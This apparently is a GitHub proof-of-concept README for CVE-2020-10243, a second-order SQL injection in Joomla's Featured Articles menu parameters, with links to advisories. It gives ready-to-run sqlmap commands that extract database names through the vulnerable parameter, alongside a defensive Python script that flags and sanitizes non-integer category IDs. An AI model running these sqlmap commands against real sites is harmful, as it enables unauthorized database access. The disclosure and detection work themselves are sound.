CVE-2020-10243: SQL injection in Featured Articles menu parameters
Latest commit 9053d24 Mar 21, 2020

Files

Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md CVE-2020-10243 PoC Mar 21, 2020

README.md

CVE-2020-10243: SQL injection in Featured Articles menu parameters

Author: Sam Thomas, Pentest.co.uk

PoC by me: April 10th, 2020: I will unlock the video

User requirement: admin (not superadmin)

Type: second-order SQL injection

Exploit video:

https://vimeo.com/398763205

Sqlmap:

```
sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "[your domain/IP]/index.php" --technique=E --dbs
```

Example:

```
sqlmap -r sqli.joomla.req --level=5 --risk=3 -p "jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D" --dbms=mysql --second-url "http://192.168.131.134:8080/index.php" --technique=E --dbs
```
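As an added defender-side example (not part of this PoC repository, and not Joomla's own patch): the injected parameter is a list of category IDs, so both detection and hardening reduce to the same check, every submitted value must be a plain positive integer. The script parses a URL-encoded form body, flags any other value for alerting, and shows the coercion that would keep the stored parameter from ever carrying anything but integers. The sample bodies are constructed, not captured traffic.

```python
import re
from urllib.parse import parse_qs

# Parameter named in the advisory, URL-decoded from
# jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D
PARAM = "jform[params][featured_categories][]"

# A category ID is a positive base-10 integer, nothing else
# (regex rather than str.isdigit(), which accepts Unicode digits int() rejects).
ID_RE = re.compile(r"[1-9][0-9]*")


def featured_category_values(body: str) -> list[str]:
    """Return the raw values submitted for the featured_categories array."""
    form = parse_qs(body, keep_blank_values=True)
    return form.get(PARAM, [])


def is_category_id(value: str) -> bool:
    return ID_RE.fullmatch(value) is not None


def flag_request(body: str) -> list[str]:
    """Detection side: every value that is not a plain category ID.
    A non-empty result is worth an alert, since the only legitimate
    content of this parameter is a list of integers."""
    return [v for v in featured_category_values(body) if not is_category_id(v)]


def sanitize_request(body: str) -> list[int]:
    """Hardening side (illustrative, assumed): coerce to int and drop the
    rest, so whatever is stored for the later (second-order) query can
    only be integers."""
    return [int(v) for v in featured_category_values(body) if is_category_id(v)]


# Constructed sample bodies: a benign save and one carrying a non-ID value.
BENIGN = ("jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D=8"
          "&jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D=12")
SUSPECT = ("jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D=8"
           "&jform%5Bparams%5D%5Bfeatured_categories%5D%5B%5D=12%20not-an-id")

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, "flagged:", flag_request(body), "kept:", sanitize_request(body))
```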

References

https://pentest.co.uk/labs/advisory/cve-2020-10243/

https://developer.joomla.org/security-centre/807-20200306-core-sql-injection-in-featured-articles-menu-parameters.html
